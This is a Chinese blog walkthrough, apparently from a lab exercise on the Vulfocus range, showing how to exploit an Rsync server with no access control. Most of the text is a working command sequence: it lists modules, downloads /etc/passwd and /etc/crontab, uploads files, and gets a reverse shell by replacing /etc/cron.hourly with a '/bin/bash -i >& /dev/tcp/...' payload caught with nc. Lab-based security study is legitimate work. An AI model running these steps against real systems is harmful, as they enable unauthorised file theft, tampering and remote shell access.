-
应用协议安全:Rsync-common 未授权访问.
应用协议安全:Rsync-common 未授权访问.
Rsync 是 Linux 下一款数据备份工具,支持通过 rsync 协议、ssh 协议进行远程文件传输。其中 rsync 协议默认监听 873 端口,如果目标开启了 rsync 服务,并且没有配置 ACL 或访问密码,我们将可以读写目标服务器文件。
目录:
靶场准备:Web安全:Vulfocus 靶场搭建.(漏洞集成平台)-CSDN博客
Rsync-common 未授权访问
靶场准备:Web安全:Vulfocus 靶场搭建.(漏洞集成平台)-CSDN博客
漏洞的测试:
第一步:测试漏洞有没有存在.
- rsync rsync://172.16.10.130:10890
- rsync rsync://测试 IP 地址:端口
第二步:测试 读取文件.
rsync rsync://172.16.10.130:55803/src/
第三步:测试 下载文件.
- rsync rsync://172.16.10.130:10890/src/etc/passwd ./
- rsync rsync://测试 IP 地址:端口/src/etc/passwd 下载到这个文件路径下
第四步:测试 上传文件.
- rsync -av passwd rsync://172.16.10.130:10890/src/tmp/passwd
- rsync -av 要上传文件 rsync://172.16.10.130:10890/路径/
rsync rsync://172.16.10.130:10890/src/tmp/passwd #读取的文件.
第五步:测试 反弹 shell
前提条件先了解:Crontab是一种运行于 Linux系统 下的定时任务管理器。它可以在指定时间执行特定的命令或脚本,并且可以设置重复周期.
- 直接下载 crontab 文件:
- rsync rsync://172.16.10.130:10890/src/etc/crontab /root/bgxg.txt
所以知道他17分钟后执行这个文件,我们就可以创建一个反弹shell的文件来替换他.
- touch bgxg #创建新文件.
- vim bgxg #编辑文件.
- #添加在文件中的内容
- /bin/bash -i >& /dev/tcp/172.16.10.130/5566 0>&1
- chmod +x bgxg #添加权限.
- 再进行上传bgxg文件,把cron.hourly替换了
- rsync -av bgxg rsync://172.16.10.130:55790/src/etc/cron.hourly
- 监听这个端口就等着反弹就好.(由于靶场时间比较短,就不等反弹时间了)
- nc -lvvp 5566
学习链接:第57天:服务攻防-应用协议_Rsync_SSH_RDP_FTP_漏洞批扫_口令猜解_哔哩哔哩_bilibili
-
相关阅读:
行业内口碑好值得信赖的短网址,让你不再选择恐惧
15. 三数之和
小鹏汽车的“未来”故事有点性感
优化大型机床装配调度:项目管理软件的应用方法
昨日阅读量898
c++入门
华为OD机考:0039-0040:url地址、序列描述
第八章 配置命名空间(三)
链路聚合 VRRP
ATTENTION, LEARN TO SOLVE ROUTING PROBLEMS!
- 原文地址:https://blog.csdn.net/weixin_54977781/article/details/134426642